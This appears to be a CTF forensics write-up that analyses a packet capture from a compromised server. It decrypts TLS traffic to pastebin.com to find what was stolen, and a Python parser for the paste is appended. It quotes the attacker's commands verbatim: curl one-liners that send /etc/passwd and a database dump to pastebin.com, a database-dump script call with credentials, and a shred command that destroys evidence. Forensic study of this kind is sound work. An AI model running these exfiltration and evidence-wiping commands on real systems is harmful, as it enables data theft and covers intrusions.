Write-up author: jon-brandy
The security team was alerted to suspicious network activity from a production web server. Can you determine if any data was stolen and what it was?
- NONE
- First, unzip the .zip file given.
RESULT
- Open the .pcap file in Wireshark.
- Now let's follow the TCP stream.
- When I followed the 2nd TCP stream, I got a clue here.
- Based on it, we know that the attacker checked connectivity to a database server, then used a script named exfildb.sh to dump the remote database.
./exfildb.sh mysql-m1.prod.htb 3306 root p4ssw0rd dbdump
- Then the attacker tried to upload the contents of /etc/passwd to pastebin.com using curl.
pastetext=$(cat /etc/passwd) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
- Seems like the attacker tried to upload the contents of /etc/passwd again.
- Next, the attacker used head to check the first four lines of the dumpdb file.
- Then he used curl again to upload the database dump to pastebin.com.
pastetext=$(cat dumpdb) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
- After that, the attacker tried to remove all the tools and the dumped database from the /tmp/.h4x directory.
find /tmp/.h4x -type f -exec shred -vfun2 {} \;
- The next thing to do is to check what was uploaded to pastebin.com.
- First, we need to load the secrets.log file we got from extracting the zip file as the TLS (Pre)-Master-Secret log filename, because we want to decrypt the encrypted HTTPS traffic.
STEPS
Go to Edit -> Preferences -> Protocols -> TLS and set the (Pre)-Master-Secret log filename to secrets.log.
- Now let's filter the HTTP traffic whose host is pastebin.com.
COMMAND
http.host=="pastebin.com"
RESULT
- After following the 1st and 2nd HTTP streams, I got nothing useful.
- But when I followed the 3rd one, I got the flag!
HTB{Th15_15_4_F3nD3r_Rh0d35_M0m3NT!!}
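As an added example (not part of the original write-up): once the TLS secrets are loaded and the pastebin.com POST is readable, the paste content can be pulled back out of the request body and characterised, so the answer to "what was stolen" is stated from the data rather than by eye. The request below is a constructed stand-in with placeholder API keys; the function names are the example's own.

```python
"""Pull exfiltrated content back out of a decrypted pastebin.com POST.
Added example, not part of the original write-up; it assumes the decrypted
request was copied out of Wireshark's Follow HTTP Stream as text, and
SAMPLE_REQUEST is a constructed stand-in with placeholder API keys."""
from urllib.parse import parse_qs

# Constructed sample. `curl -d` sends the body unencoded and $(cat ...) drops
# trailing newlines, so the paste carries raw newlines and no final one.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin")
SAMPLE_BODY = ("api_user_key=USERKEY_PLACEHOLDER&api_dev_key=DEVKEY_PLACEHOLDER"
               "&api_paste_private=2&api_option=paste&api_paste_code=" + SAMPLE_PASSWD)
SAMPLE_REQUEST = ("POST /api/api_post.php HTTP/1.1\r\nHost: pastebin.com\r\n"
                  "Content-Type: application/x-www-form-urlencoded\r\n"
                  f"Content-Length: {len(SAMPLE_BODY)}\r\n\r\n" + SAMPLE_BODY)


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"request_line": request_line, "headers": headers, "body": body}


def summarize_paste(raw: str) -> dict:
    """Describe what a pastebin.com API POST carried, if the request is one."""
    req = parse_http_request(raw)
    if req["headers"].get("host") != "pastebin.com" or not req["request_line"].startswith("POST "):
        return {"is_pastebin_paste": False}
    # parse_qs splits only on '&' and '=', so raw newlines in the value survive;
    # it does turn '+' into a space, which would alter data holding literal pluses.
    form = {k: v[0] for k, v in parse_qs(req["body"], keep_blank_values=True).items()}
    if "api_paste_code" not in form:
        return {"is_pastebin_paste": False}
    lines = form["api_paste_code"].splitlines()
    return {
        "is_pastebin_paste": True,
        "private": form.get("api_paste_private") == "2",  # 2 = private paste
        "line_count": len(lines),
        "first_line": lines[0] if lines else "",
        # Seven colon-separated fields on every line is the passwd(5) layout.
        "looks_like_passwd": bool(lines) and all(len(l.split(":")) == 7 for l in lines),
    }
```

Run the same function over each decrypted pastebin.com request in the capture and the dumpdb upload stands out as the one whose lines do not fit the passwd layout.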